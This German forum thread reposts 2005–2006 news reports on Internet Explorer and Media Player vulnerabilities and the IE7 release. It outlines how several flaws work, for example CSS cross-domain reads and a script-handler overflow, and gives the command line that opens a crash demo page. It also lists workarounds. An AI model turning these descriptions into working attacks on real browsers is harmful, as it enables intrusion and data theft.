Die Lücke könnte dem Entdecker Amit Klein zufolge beispielsweise von einer gut gefälschten Website ausgenutzt werden, um Daten aus dem Browser-Cache auszulesen oder in die Kommunikation zwischen Client und Webserver einzugreifen -- ein klassischer Man-in-the-Middle-Angriff, bei dem die angreifende Webseite die Kommunikation zwischen dem Opfer und der "echten" Seite belauschen oder manipulieren kann. Denkbar ist auch der Missbrauch des Opfer-Rechners als Proxy zum Scannen von Web- und Intranet-Seiten. Laut US-amerikanischen Medienberichten sondiert Microsoft derzeit die Lücke. Als Workaround genügt es, ActiveX zu deaktivieren oder besser gleich die Sicherheitsstufe im Internet Explorer auf "hoch" zu setzen.
Siehe dazu auch:
* Exploiting the XmlHttpRequest object in IE von Amit Klein * Netscape immer noch für Firefox-Lücken anfällig, Meldung von heise Security
Quelle und Links : http://www.heise.de/newsticker/meldung/64426
Titel: Schwachstellen in Internet Explorer und Windows Media Player
Beitrag von: SiLæncer am 19 Oktober, 2005, 14:31
Durch Sicherheitslücken im Internet Explorer und im Media Player kann Code eingeschleust werden.
Die Liste der Sicherheitslücken, die von Eeye Digital Security (http://www.eeye.com) entdeckt und von Microsoft noch nicht behoben wurden, wächst weiter. Jetzt haben die Sicherheitsfachleute eine Schwachstelle entdeckt, die sowohl den Internet Explorer als auch den Windows Media Player betrifft.
Die Sicherheitslücke wird von Eeye als schwerwiegend eingestuft. Durch sie kann schädlicher Code eingeschleust und ausgeführt werden. Betroffen sind laut Eeye Standardinstallationen der genannten Programme auf Rechnern mit Windows NT und 2000, Windows XP mit Service Pack 1 und 2 sowie Windows Server 2003 mit und ohne installiertes Service Pack 1.
Wie üblich gibt Eeye in seiner Ankündigung einer Sicherheitsempfehlung keine weiteren Details zu den gefundenen Problemen bekannt. Ein Unternehmenssprecher meinte jedoch, die Lücke sei vermutlich nicht Wurm-tauglich. Microsoft wurde am 17. Oktober über die Entdeckung informiert. Eine offizielle Stellungnahme dazu ist bislang nicht bekannt.
Die Liste der Sicherheitlücken in Windows, namentlich im Internet Explorer, die von Eeye aufgedeckt und von Microsoft noch nicht geschlossen wurden, enthält inzwischen sieben Einträge, fünf davon werden von Eeye als "überfällig" eingestuft. Sie betreffen Schwachstellen, die bereits vor mehr als zwei Monaten an Microsoft gemeldet wurden.
Quelle : http://www.pcwelt.de/news/sicherheit/122268/index.html
Titel: Phishing-Schutz für Internet Explorer 6
Beitrag von: SiLæncer am 21 Oktober, 2005, 17:13
Microsoft hat auf der MSN-Homepage ein Helferlein bereitgestellt, das Nutzer des Internet Explorer 6 besser vor Phishing-Attacken schützen soll. Da es sich bei dem Phishing-Filter um eine Erweiterung für die MSN-Toolbar handelt, muss diese bereits vorhanden sein. Die Erweiterung ist nur auf Englisch erhältlich, arbeitete aber in einem Kurztest von heise online auch mit einer deutschsprachigen MSN-Toolbar zusammen.
Das "Microsoft Phishing Filter Add-in for MSN Search Toolbar (Beta)" -- so der offizielle Name -- benutzt dieselbe Technik, die auch im Internet Explorer 7 zum Einsatz kommen soll. Der Phishing-Filter des Internet Explorer 7 schlägt vor dem Aufruf einer unbekannten Seite erst in einer lokalen Whitelist nach. Ist diese dort nicht verzeichnet, sendet er die URL an einen Anti-Phishing-Server der Redmonder, der die Seite in Echtzeit untersucht. Dort wird die Seite dann eingestuft. Bei verdächtigen Seiten warnt der Browser.
Quelle und Links : http://www.heise.de/security/news/meldung/65219
Titel: Sicherheitsleck lässt Internet Explorer abstürzen
Beitrag von: SiLæncer am 26 Oktober, 2005, 13:11
Manipuliertes HTML-Tag bringt Browser zum Absturz
Ein Sicherheitsloch im Internet Explorer lässt den Browser nach Erkenntnissen des Sicherheitsexperten Tom Ferris abstürzen, so dass Angreifer über präparierte Webseiten den Browser gezielt beenden könnten. Ein Patch zur Beseitigung des Sicherheitslochs liegt derzeit nicht vor.
Die Rendering Engine vom Internet Explorer, Trident, wird von zahlreichen E-Mail-Programmen für die Anzeige von HTML-Nachrichten verwendet. Daher könnte der Fehler im Internet Explorer auch dazu missbraucht werden, um E-Mail-Clients gezielt abstürzen zu lassen.
Mittels eines speziellen HTML-Tags macht sich der Fehler laut Tom Ferris bemerkbar und bringt den Internet Explorer zum Absturz, sofern Suns J2SE Runtime Environment installiert ist. Ein Proof-of-Concept illustriert den Programmabsturz.
Microsoft bietet derzeit keinen Patch an, um das Sicherheitsloch im Internet Explorer zu schließen. Der Fehler wurde nach Angabe von Tom Ferris bereits im August 2005 an Microsoft gemeldet und wurde für den Internet Explorer 6 einschließlich aller verfügbaren Patches unter Windows XP mit Service Pack 2 bestätigt.
Quelle und Links : http://www.golem.de/0510/41243.html
Titel: Ungepatchter Fehler im Internet Explorer ermöglicht Datenspionage
Beitrag von: SiLæncer am 02 Dezember, 2005, 19:35
Der Internet Explorer von Microsoft macht beim Import von kaskadierenden Stylesheets (CSS) einen kritischen Fehler. Wie aus dem Advisory des Entdeckers Matan Gillon hervor geht, lässt sich dieser ausnutzen, um unter Umständen vertrauliche Nutzerdaten, wie Kredikartennummern, Passwörter oder Zugangsdaten für Online-Dienste auszuspionieren.
Als Proof-Of-Concept liefert Matan Gillon, der diese Methode in Anlehnung an bekannte Cross-Site-Scripting-Angriffe als CSSXSS bezeichnet, eine HTML-Seite, die Informationen einer installierten Google-Desktop-Suche ausliest. Ein boshaften Angreifer könnte diese Informationen beispielsweise durch geeignete HTTP-Anfragen zu einem anderen Rechner im Internet schicken lassen.
Externe Stylesheet-Quellen lassen sich durch @import oder durch die Javascript-Funktion addImport einbinden. Die sonst üblichen Restriktionen für die so genannte Cross-Domain-Interaktion, die ein direktes Auslesen verhindern würden, sind dabei zur Vermeidung von Komplikationen gelockert. Die empfangenen Daten brauchen dann lediglich ein zusammengehöriges Paar aus geschweiften Klammern zu enthalten, damit der IE diese als CSS-Daten interpretiert. Selbst wenn die interpretierten Daten im CSS-Kontext keinen Sinn ergeben, lassen sie sich teilweise durch das DOM-Objekt cssText vom Javascript-Code auslesen und verwerten.
Benutzer des Internet Explorer sollten besondere Vorsicht beim Besuch von nicht vertrauenswürdigen Seiten walten lassen und im Zweifelsfall JavaScript deaktivieren, bis ein Patch für diese Sicherheitslücke verfügbar ist. Nach Angaben von Gillon sind Firefox und Opera für diese Lücke nicht anfällig, da sie mit härteren Restriktionen arbeiten beziehungsweise die notwendigen Funktionen nicht unterstützen.
Siehe dazu auch:
* Advisory von Matan Gillon, zur CSS-Lücke im Internet Explorer
Quelle und Links : http://www.heise.de/security/news/meldung/66928
Titel: Google sichert Desktop-Suche gegen aktuelle IE-Lücke
Beitrag von: SiLæncer am 05 Dezember, 2005, 17:19
Google hat den Online-Teil seiner Desktop-Suche derart verändert, dass sie sich nicht mehr für einen Proof-Of-Concept-Exploit zur vergangenen Woche gemeldeten Lücke im Stylesheet-Parser des Internet Explorers nutzen lässt. Der Entdecker Matan Gillon demonstrierte am Beispiel der Desktop-Suche, wie sich durch die Sicherheitslücke vertrauliche Informationen gewinnen lassen.
Das eigentliche Problem im CSS-Parser des Internet Explorers bleibt hingegen vorerst ungepatcht. Dieses ermöglicht schadhaftem JavaScript-Code unerlaubte Inter-Domain-Zugriffe. Von den so gewonnenen Daten lassen sich allerdings nur die Teile auswerten, die eine CSS-Struktur mit geschweiften Klammern aufweisen. Diese lassen sich jedoch häufig über die URL-Parameter dynamischer Webseiten an geeigneten Stellen einschleusen.
Quelle und Links : http://www.heise.de/newsticker/meldung/66998
Titel: Neue Drag&Drop-Lücke im Internet Explorer
Beitrag von: SiLæncer am 14 Februar, 2006, 19:33
Fehleinschätzungen gibt jeder einmal ab, normalerweise sollte man daraus aber lernen, um sie künftig zu vermeiden – zumindest wenn es sich um den gleichen Sachverhalt handelt. Mit der Beurteilung des Risikos einer neuen Lücke im Internet Explorer scheint Microsoft aber wieder einmal daneben zu liegen, weshalb ein Patch zum Schließen dieser Lücke bei Windows XP erst in Service Pack 3 und bei Windows Server 2003 erst in Service Pack 2 enthalten sein soll. Für Windows 2000 soll gar kein Patch erscheinen. Bei der Lücke handelt es sich um einen Fehler in der Drag&Drop-Funktion des Browsers aus Redmond, mit dem sich beliebige ausführbare Dateien in Ordnern speichern lassen, um sie beim nächsten Start von Windows oder per Scheduler auszuführen.
Wie der Name der Funktion schon vermuten lässt, ist einiges an Benutzerinteraktion notwendig: Der Anwender muss ein Objekt nehmen und irgendwo fallenlassen. Zwar liegt das Risiko des Anwenders, sein System mit Schadcode zu infizieren, erheblich unter dem der WMF-Lücke, bei der bereits der Aufruf einer Webseite genügte, aber schon bei der Drag&Drop-Lücke im August 2004 musste Microsoft nach der ersten Fehleinschätzung schneller als gewollt reagieren. Damals erschien dem Softwarekonzern das Angriffsszenario arg konstruiert: "Given the significant amount of user action required to execute an attack, Microsoft does not consider this to be a high risk for customers."
Allerdings tauchten kurz darauf die ersten Webseiten auf, die versuchten, Anwender mit Drag&Drop-Spielchen auszutricksen, woraufhin Microsoft das Risiko auf "Important" hochstufte und doch ein Update herausgab. Im vorliegenden Falle scheint es aber noch keine Webseiten zu geben, die die Lücke ausnutzen. Microsoft wurde bereits im August 2005 über den Fehler informiert.
Der Entdecker der Schwachstelle, Matthew Murphy, beschreibt drei Workarounds, um sich vor möglichen Angriffen zu schützen. Die einfachste Lösung ist, JavaScript abzuschalten, dann funktionieren aber nicht mehr alle Webseiten. Workaround Nummer zwei beschränkt den Zugriff von Webseiten auf die lokale Zone, was aber erst ab Windows XP mit Service Pack 2 und Windows Server 2003 SP1 möglich ist. Lösung drei setzt ein so genanntes Kill-Bit auf das Shell.Explorer-Control, sodass es nicht mehr aus dem Browser heraus aufgerufen werden kann und lokale Ordner nicht mehr angezeigt werden. Damit kann der Anwender ein aufgenommenes Objekt (Drag) auch nicht mehr in einem lokalen Verzeichnis fallenlassen (Drop).
Siehe dazu auch:
* Microsoft Internet Explorer Drag-and-Drop Redeux, Fehlerreport von Matthew Murphy * Information on IE Drag and Drop Issue , Eintrag im Microsoft Security Response Center Blog
Quelle und Links : http://www.heise.de/security/news/meldung/69558
Titel: Neue ungepatchte Sicherheitslücke im Internet Explorer
Beitrag von: SiLæncer am 17 März, 2006, 14:01
Michal Zalewski, der schon früher mit Stresstests Fehler in Microsofts Webbrowser Internet Explorer aufdeckte, hat erneut eine Schwachstelle im zurzeit meistgenutzten Webbrowser entdeckt. Über den Fehler könnten Angreifer Code einschleusen und zur Ausführung bringen. Zalewski hat eine Seite zur Demonstration der Lücke aufgesetzt; sie bringt den Internet Explorer auf einem Windows XP SP2 mit allen aktuellen Patches zum Absturz.
Der Fehler lässt sich laut Entdecker dadurch provozieren, dass für ein beliebiges HTML-Tag in einer Seite mehrere Tausend Script-Action-Handler wie onLoad oder onMouseMove spezifiziert werden – dies funktioniert auf seiner Demo-Webseite sogar mit nicht existierenden Tags (<foo>) sowie mit sinnlosen Aktionen (onclick=bork). Der Internet Explorer beziehungsweise dessen Komponente mshtml.dll versucht daraufhin, außerhalb seiner Speichergrenzen zu schreiben. Die Adresse dieses Schreibvorganges lässt sich vorher berechnen. Ob der Browser nun einfach nur abstürzt oder eingeschleuster Code zur Ausführung kommt, hängt etwa von den vorher besuchten Seiten oder zusätzlich geladenen Erweiterungen ab. Der Speicherzustand in der betroffenen Region lässt sich mit etwas Geschick von einem Angreifer kontrollieren.
Die Seite zur Demonstration der Schwachstelle führt auf Grund dieser Umstände nicht unbedingt sofort zum Absturz des Internet Explorer. Schließt man jedoch alle Instanzen des Browsers und ruft ihn mitsamt der URL über Ausführen im Startmenü auf, stürzt der Browser spätestens nach mehreren manuellen Aktualisierungen der Seite ab. Die Kommandozeile dazu lautet iexplore http://lcamtuf.coredump.cx/iedie.html.
Zurzeit steht kein Patch oder Workaround für diese Schwachstelle zu Verfügung. Da scheinbar Browser wie Firefox oder Opera nicht von diesem Fehler betroffen sind, sollten besonders vorsichtige Naturen die konkurrierenden Browser zumindest bis zur Schließung der Lücke durch Microsoft zum Surfen im Netz nutzen. Da Zalewski viele Details veröffentlicht hat, werden wohl in Kürze erste Seiten online gehen, die Nutzern des Internet Explorer über die Sicherheitslücke Schadcode unterschieben wollen.
Siehe dazu auch:
* Remote overflow in MSIE script action handlers (mshtml.dll) von Michal Zalewski * Demonstration der Schwachstelle (Vorsicht, Browserabsturz möglich)
Quelle und Links : http://www.heise.de/newsticker/meldung/70952
Titel: Neue Lücke im Internet Explorer
Beitrag von: SiLæncer am 21 März, 2006, 18:37
Der Niederländer Jeffrey van der Stad hat eine neue Lücke im Internet Explorer gefunden. Sie soll es ermöglichen, beim Besuch einer Web-Seite hta-Dateien mit den Rechten des Anwenders auszuführen. Diese HTML Applikationen sind sozusagen in HTML verpackte Programme und können unter anderem Dateien lesen oder schreiben. Somit wäre es einer Web-Seite beispielsweise möglich, die Systeme ihrer Besucher mit Schadsoftware zu infizieren.
Van der Stad hat Microsoft kontaktiert und über den Fehler informiert. Mittlerweile konnten die Redmonder den Fehler reproduzieren und haben angekündigt, ihn wenn möglich im nächsten "IE Release" zu beheben; ein genauer Termin dafür ist jedoch nicht bekannt. Unterdessen hat van der Stad weitere Informationen zu der Schwachstelle auf Anfrage von Microsoft entfernt. Eine Demonstration dazu will er veröffentlichen, wenn ein Patch verfügbar ist.
Siehe dazu auch:
* The grasshopper vulnerability von Jeffrey van der Stad
Quelle und Links : http://www.heise.de/security/news/meldung/71111
Titel: Zahlreiche Sicherheitslecks im Internet Explorer
Beitrag von: SiLæncer am 03 Juli, 2006, 17:08
Im Internet Explorer wurden wieder mehrere Schwachstellen gefunden. Ob sie sich ausnutzen lassen, um fremden Code einzuschleusen und auszuführen, ist bislang unklar. In Tests von heise Security stürzte der Internet Explorer zumindest ab.
Der Metasploit-Entwickler H. D. Moore hat in seinem Blog zwei Sicherheitslöcher in ActiveX-Komponenten gemeldet. Als kritisch stuft das französische FrSIRT die von Moore gemeldete Lücke im ActiveX-Modul HHCtrl zur Anzeige von HTML-Hilfe-Dateien ein. Beim Verarbeiten manipulierter Image-Eigenschaften kommt es zu einem heapbasierten Pufferüberlauf. Dadurch können laut Moore Angreifer möglicherweise Schadcode auf das System einschleusen und mit den Rechten des Benutzers ausführen.
Zumindest einen Absturz des Browsers kann eine Webseite etwa durch das mehrfache Setzen eines Filters auf die Eigenschaft Recordset des Datenbank-ActiveX-Controls ADODB provozieren. Aufgrund einer dann auftretenden NULL-Zeiger-Dereferenzierung kommt es zum Absturz des Internet Explorers.
Moore hat nach eigenen Angaben beide Fehler bereits im März an Microsoft gemeldet und stellt nun einfache Demonstrationen dazu bereit. Der Metasploit-Entwickler hat sich in letzter Zeit bereits öfter als Anhänger einer Full-Disclosure-Politik hervor getan. So war er einer der Ersten, der einen funktionierenden Exploit für die WMF-Lücke entwickelt hat. Auch sein Exploit für die erst kürzlich geschlossene RRAS-Schwachstelle stieß bei Microsoft auf wenig Gegenliebe.
Zwei weitere Sicherheitslücken hat Plebo Aesdi Nael auf der Mailingliste Full Disclosure gemeldet. Eine davon kann einmal mehr beim Verarbeiten von hta-Dateien auftreten. hta-Dateien sind HTML-Applikationen, also in HTML eingepackte Programme. Diese könnten nach einem Doppelklick vom Anwender ausgeführt werden, sofern sie etwa auf einem WebDAV-Server oder auf einer erreichbaren Windows-Freigabe liegen. Möglicherweise lässt sich das Prozedere zum Ausführen vereinfachen. Von Microsoft gibt es bislang nur die vage Aussage, dass man das Problem untersuche.
Die andere von Nael gemeldete Schwachstelle betrifft den Cross-Domain-Schutz – Skripte in Webseiten sollten nur auf ihre eigenen Inhalte zugreifen dürfen und nicht etwa auf Inhalte anderer Webseiten. In Kombination mit einem Redirect kann ein Skript über die Eigenschaft object.documentElement.outerHTML auch Inhalte fremder Seiten auslesen. Im Internet Explorer 7 funktioniert dieser Angriff aufgrund neuer Sicherungsmechanismen im Browser nicht mehr. Es kamen Gerüchte auf, diese Schwachstelle beträfe auch Firefox – dabei handelt es sich jedoch um ein Missverständnis. Zwar öffnet Firefox die zweite Seite und zeigt den Inhalt an, kann ihren Inhalt jedoch nicht auslesen. Der Sicherheitsdienstleister Secunia stellt eine Demonstrationsseite bereit, mit der man seinen Browser auf Anfälligkeit für die Lücke überprüfen kann.
Siehe dazu auch:
* IE_ONE_MINOR_ONE_MAJOR, Sicherheitsmeldung von Plebo Aesdi Nael auf Full Disclosure * Internet Explorer Information Disclosure Vulnerability Test, Test der Cross-Domain-Schwachstelle von Secunia * ADODB.Recordset Filter Property, Fehlermeldung von H.D. Moore * Internet.HHCtrl Image Property, Fehlermeldung von H.D. Moore
Quelle und Links : http://www.heise.de/security/news/meldung/74996
Titel: Internet Explorer: Zwanzig neue Schwachstellen in zwanzig Tagen
Beitrag von: SiLæncer am 20 Juli, 2006, 12:07
Der vom Metasploit-Entwickler H.D. Moore für den Juli verkündete Month of Browser Bugs (MoBB) hat bislang 20 Sicherheitslücken im Internet Explorer zu Tage gefördert. Moore hatte sich Anfang Juli das Ziel gesetzt, jeden Tag einen neuen Fehler zu veröffentlichen.
Während fast alle der bislang gefundenen Schwachstellen sich nur für Denial-of-Service-Attacken gegen Microsofts Browser ausnutzen ließen, soll eine der neuesten Entdeckungen aber das Einschleusen von Schadcode ermöglichen. Zwar beruht die Lücke auf einem Integer Overflow und nicht wie die meisten anderen auf Null-Pointer-Dereferences, ein Beweis der Ausnutzbarkeit steht aber noch aus. Die Demo von H.D. Moore bringt den Browser nur zum Absturz. Das französische FrSIRT stuft den Fehler dennoch als kritisch ein. Der Fehler findet sich in der Common Controls library comctl32.dll und wird durch bestimmte Aufrufe der Funktion setSlice() zur Darstellung von WebViewFolderIcons provoziert.
Für keine der von Moore in seinem Blog "Browser Fun - Browser bugs, tricks, and hacks" skizzierten Fehler gibt es bislang einen Patch, weil er die Informationen sofort veröffentlicht – ohne Microsoft zu informieren. Ohnehin hat sich Metasploit-Entwickler in letzter Zeit bereits öfter als Anhänger einer Full-Disclosure-Politik hervorgetan. So war er einer der Ersten, der einen funktionierenden Exploit für die WMF-Lücke entwickelt hat. Auch sein Exploit für die erst kürzlich geschlossene RRAS-Schwachstelle stieß bei Microsoft auf wenig Gegenliebe.
Siehe dazu auch:
* Browser Fun - bugs, tricks, and hacks, IE-Fehlerberichte von H.D.Moore * Ein Haufen Risiko - Pufferüberläufe auf dem Heap und wie man sie ausnutzt, Hintergrundartikel auf heisec Sercurity * Metasploit - Exploits für alle, Hintergrundartikel auf heisec Sercurity
Quelle und Links : http://www.heise.de/security/news/meldung/75710
Titel: Internet Explorer mit gefährlichem Sicherheitsloch (mal wieder)
Beitrag von: SiLæncer am 30 August, 2006, 10:36
Sicherheitslücke erlaubt Ausführung von Programmcode; kein Patch verfügbar
Im Internet Explorer 6 wurde ein neues Sicherheitsloch entdeckt, worüber Angreifer beliebigen Programmcode ausführen können. Beispiel-Code illustriert zumindest einen Denial-of-Service-Angriff. Bislang steht kein Patch zur Abhilfe bereit. Das Sicherheitsloch im ActiveX-Control "daxctle.ocx" kann zu einem Buffer Overflow im Internet Explorer 6 führen, worüber ein Angreifer einen Denial-of-Service-Angriff vornehmen kann. Entsprechender Beispiel-Code illustriert dieses Szenario. Nach Angaben der Entdecker des Sicherheitslochs lässt sich darüber aber auch schadhafter Programmcode mit den Rechten des angemeldeten Nutzers ausführen.
Der Fehler soll im Internet Explorer ab der Version 6.0 mit Service Pack 1 stecken. Das Sicherheitsloch wurde für Windows 2000 mit Service Pack 4, Windows XP mit Service Pack 2 sowie Windows Server 2003 mit Service Pack 1 bestätigt. Bislang ist kein Patch zur Beseitigung des Sicherheitslecks verfügbar.
Quelle : www.golem.de
Titel: Gefahr durch DirectAnimation im Internet Explorer
Beitrag von: SiLæncer am 15 September, 2006, 11:41
Auf einer Sicherheits-Mailingliste ist eine Demo veröffentlicht worden, die eine Sicherheitslücke in einem ActiveX-Control ausnutzt, um über den Internet Explorer Code einzuschleusen und auszuführen. Damit könnten speziell präparierte Web-Seiten beispielsweise Spyware auf dem Rechner eines Besuchers installieren, wie es in der Vergangenheit bereits öfter passiert ist. Microsoft hat den Fehler bestätigt und bereits eine diesbzügliche Sicherheitswarnung herausgegeben: Man untersuche das Problem derzeit, ein Fix werde mit einem bevorstehenden Security Bulletin veröffentlicht. Einen konkreten Zeitrahmen nennt Microsoft dabei jedoch nicht.
Das Problem beruht auf einem Programmierfehler in dem ActiveX Control daxctle.ocx, der zu einem Pufferüberlauf auf dem Heap führen kann. Das Control gehört zu DirectAnimation, was wiederum ein Bestandteil von DirectX ist, und die Darstellung von animierten Multimedia-Inhalten erlaubt. Der veröffentlichte Proof-of-Concept-Exploit funktioniert offenbar unzuverlässig und nur mit chinesischen Windows-Versionen, trägt allerdings den Vermerk "öffentliche Version". Darüber hinaus konnte der Sicherheitsdienstleister Secunia nach eigenen Aussagen verifizieren, dass sich der der Fehler auf einem vollständig gepatchten System mit Windows XP Service Pack 2 gezielt ausnutzen lässt.
Microsoft beschreibt in seiner Notiz eine Reihe von Workarounds, um sich bis zur Bereitstellung eines Patches zu schützen. Sie laufen im wesentlichen darauf hinaus, ActiveX in den Einstellungen des Internet Explorer zu deaktivieren oder zumindest nur nach Nachfrage zu gestatten. Wie Sie die Einstellungen des Internet Explorer sicherer gestallten, zeigt auch der c't Browsercheck auf heise Security. Anwender mit ausreichenden Kenntnissen können auch das DirectAnimation-Control deaktivieren, indem sie dafür das Killbit in der Registry setzen. Da alternative Browser wie Firefox oder Opera kein ActiveX ausführen, sind sie nicht von diesem Problem betroffen.
Siehe dazu auch:
* Vulnerability in the Microsoft DirectAnimation Path ActiveX Control Could Allow Remote Control Execution von Microsoft * Microsoft DirectAnimation Path ActiveX control fails to validate input Sicherheitsnotiz des US-CERT
Quelle und Links : http://www.heise.de/security/news/meldung/78220
Titel: Zweite Lücke im IE wird nun ebenfalls aktiv ausgenutzt
Beitrag von: SiLæncer am 27 September, 2006, 10:46
Kaum hat Microsoft die VML-Lücke im Internet Explorer mit einem außerplanmäßigen Patch geschlossen, erwächst die zweite noch offene Lücke nun ebenfalls zu einem größeren Problem. Diese wurde bereits vor zwei Wochen im Multimedia Control daxctle.ocx für DirectAnimation entdeckt. Abgesehen von einem Proof-of-Concept-Exploit, der nur auf chinesischen Windows-2000-Rechnern mit gewissen Einschränkungen funktionierte, waren aber keine weiteren öffentlichen Exploits bekannt, die diese Lücke ausnutzten, um den PCs der Besucher präparierter Webseiten Schädlinge unterzujubeln. Nur der Sicherheitsdienstleister Secunia will in seinen Laboren einen Exploit entwickelt haben, der ein vollständig gepatchtes Windows XP SP2 infizieren kann.
Nach Angaben des Herstellers Sunbelt hat sich dies offenbar geändert. Wie bei der VML-Lücke tauchen nun Webseiten im Netz auf, die in der Lage sind, Schadcode in Windows-XP-SP2-Rechner zu schleusen und zu starten. Eine Nutzerinteraktion, abgesehen vom Aufruf der Seite, ist nicht erforderlich. Es kursieren bereits mehrere Grußkarten im Netz, die versuchen, Anwender auf verseuchte Webseiten zu locken oder dorthin umzuleiten. Eine der von Sunbelt identifizierten Seiten leitet Anwender von einer Porno-Seite in Netzbereiche, in denen vormals auch der VML-Exploit zuerst entdeckt wurde.
Der neue Exploit lädt eine gefälschte Version der Datei svchost.exe auf den Rechner. Zudem nimmt eine Backdoor (%system%\hehesox.dll) Befehle von außen entgegen. Bis zum Erscheinen eines Patches können Anwender sich behelfen, indem sie ActiveX komplett deaktivieren oder das betroffene Control einzeln abschalten. Dazu muss ein so genanntes Kill-Bit gesetzt werden. Einzelheiten dazu beschreibt Microsoft in einem Fehlerbericht zu der Lücke.
Siehe dazu auch:
* Another zero day on the loose? keyframe (daxctle.ocx) exploit seen in the wild, Blogeintrag von Sunbelt
Quelle und Links : http://www.heise.de/security/news/meldung/78725
Titel: Internet Explorer 7 ist da
Beitrag von: SiLæncer am 19 Oktober, 2006, 09:14
Zwanzig Monate und drei Tage nach Bill Gates' Ankündigung des Internet Explorer 7 haben die Microsoft-Entwickler ihre Arbeit an dem Browser abgeschlossen: Die neue Version des Microsoft-Webbrowsers steht zum Download für Windows XP mit Service Pack 2, Windows XP Professional x64 sowie Windows Server 2003 mit Service Pack 1, Windows Server 2003 x64 und Windows Server 2003 IA64 bereit. Derzeit gibt es nur die englische Version, Ausgaben in anderen Landessprachen, darunter eine deutschsprachige Version, werden in den nächsten Tagen und Wochen folgen. Automatische Updates durch Microsoft sollen laut Microsoft zudem ab November auch Millionen von Windows-XP-Rechnern, die nicht per manuellem Download umgerüstet wurden, mit der neuen Version des Internet Explorer 7 versorgen; Microsoft stellt aber auch ein Tool bereit, um die automatische Auslieferung zu verhindern. Yahoo hatte es sich übrigens sogar erlaubt, noch vor der offiziellen Freigabe durch Microsoft eine für das Internetportal optimierte Version des Internet Explorer 7 bereitzustellen.
Ursprünglich hatte Microsoft geplant, Internet Explorer 7 an die kommende Windows-Version Vista zu binden; nach dem Erfolg des 2001 veröffentlichten Internet Explorer 6 hatte der Software-Riese die Entwicklungsmannschaft aufgelöst. Erst nachdem die Explorer-Marktanteile, die zeitweise 96 Prozent erreicht hatten, allmählich abbröckelten und sich Anwender über Sicherheitslücken und fehlenden Komfort unzufrieden zeigten, schwenkte Microsoft um. Nach drei Betaversionen – die erste bereits im Juli 2005 erschienen – und einem Release-Kandidaten wird der Browser heute auf die große Masse von Anwendern losgelassen.
Offensichtlichste Neuerung gegenüber dem längst veralteten Internet Explorer 6 ist die aus anderen Browsern längst bekannte Mehrfenster-Oberfläche ("Tabbed Browsing"). Die gesamte Menüleiste hat Microsoft auf die beiden Punkte "Seite" und "Extras" zusammengedampft; das "klassische" Menü ist aber optional verfügbar.
Suchmaschinen kann der Internet Explorer 7 über ein Eingabefeld direkt befragen; neue Suchmaschinen lassen sich der Anbieterliste mühelos hinzufügen. Eine neue Zoom-Funktion vergrößert die ganze Seite, nicht nur die Schrift; dank dieser Technik passt der Browser Ausdrucke an das Papierformat an. Private Anwenderdaten wie Cookies, History oder Formulareingaben lassen sich mit einem Menüpunkt rasch löschen.
Für Newsfeeds in RSS und Atom bringt der Browser eine komplette "Windows RSS Platform" mit, die auch andere Anwendungen nutzen können; die Feeds werden grafisch ansprechend aufbereitet und sind über eine inkrementelle Suche (die sonst im Browser leider fehlt) zugänglich.
Der Internet Explorer 7 kann nun auch internationale Domainnamen (IDN, "Umlautdomains") auflösen. Aus Sicherheitsgründen warnt der Browser jedoch bei Phishing-Tricks, die ähnlich aussehende Zeichen aus verschiedenen Sprachen missbrauchen. Beim Ansurfen von Webadressen, die nicht auf einer internen Whitelist stehen, versucht der Browser, Phishing-Tricks zu erkennen. Kommt ihm die Seite verdächtig vor, markiert er sie und legt sie auf Wunsch einem Microsoft-Server zur Prüfung vor.
Wesentlich rigider geht der Internet Explorer 7 mit den notorisch sicherheitskritischen ActiveX-Webanwendungen um: Außer für wenige verbreitete ActiveX-Controls muss der Anwender der Ausführung zustimmen. Die Sicherheitseinstellungen weisen darauf hin, wenn sie ein leichtsinniger Anwender zu lax einstellt. Außerdem haben die Microsoft-Entwickler versucht, Schwachstellen beim Zonenmodell, bei Zertifikaten und bei schwacher Verschlüsselung zu schließen. Der User Account Control, bei dem der Anwender in einer Sandbox surft, und der Kinderschutz sind Vista-Kunden vorbehalten.
Außer an der Oberfläche und an der Sicherheit hat Microsoft auch an der Unterstützung von Webstandards gearbeitet. Hier hinkt der Internet Explorer 7 den Konkurrenten Firefox, Opera und Safari zwar deutlich hinterher, aber immerhin reparierte die Entwicklermannschaft die lästigsten CSS-Bugs. Allerdings dürften auch die meisten CSS-Hacks für den Microsoft-Webbrowser nicht mehr funktionieren. Auch halbtransparente PNG-Grafiken kann der Browser endlich anzeigen.
Wer mit dem Internet Explorer 7 nicht zufrieden ist, kann immerhin auf die Zukunft hoffen: Microsoft hat angekündigt, die Browserentwicklung wieder mit voller Kraft zu betreiben. Möglicherweise steht also 2007 Internet Explorer 8 ins Haus.
Zum Internet Explorer 7 siehe auch den Schwerpunkt in c't 22/06 mit Artikeln zu neuen Funktionen (S. 186) und der Unterstützung von Web-Standars (S. 190). Ein Artikel auf heise Security geht zudem im Detail darauf ein, wie man das von Microsoft vorgesehene automatische Update auf den Internet Explorer 7 verhindert beziehungsweise den Update-Prozess selbst steuert.
Quelle : www.heise.de --------------------------------------
Wer es denn braucht ... :P
Titel: Erste Sicherheitslücke im Internet Explorer 7
Beitrag von: SiLæncer am 19 Oktober, 2006, 11:51
Microsoft hat den Internet Explorer 7 gerade erst veröffentlicht, da meldet der Sicherheitsdienstleister Secunia schon die erste Sicherheitslücke im neuen Browser. Angreifer können durch die Schwachstelle laut Secunia vertrauliche Daten von geöffneten Webseiten ausspähen.
Secunia stellt auch eine Webseite zur Demonstration der Schwachstelle bereit, die nach dem Klick auf einen Link versucht, Inhalte von news.google.com auszulesen. Auf einem Testrechner von heise Security gelang dies unter einem Windows XP SP2 mit allen aktuellen Patches und der englischen Version vom Internet Explorer 7 – die deutsche Version des Browsers lässt noch immer auf sich warten.
Der Fehler, der sowohl den Internet Explorer 6 als auch die neue Ausgabe 7 des Microsoft-Webbrowsers betrifft, beruht auf den fehlerhaften Umgang von Umleitungen mit mhtml://-URIs. Als Gegenmaßnahme schlägt der Sicherheitsdienstleister vor, Active Scripting zu deaktivieren. Wer erst einmal abwarten und den Internet Explorer 7 nicht per automatischem Zwangs-Update Anfang November auf seinen Rechner installieren lassen möchte, findet Hilfestellung dazu in einem Artikel auf heise Security.
Siehe dazu auch:
* Internet Explorer 7 "mhtml:" Redirection Information Disclosure, Sicherheitsmeldung von Secunia * Demonstration der Sicherheitslücke von Secunia * Das automatische Internet-Explorer-7-Update verhindern, Artikel auf heise Security
Quelle und Links : http://www.heise.de/security/news/meldung/79719
-----------------------------------------------
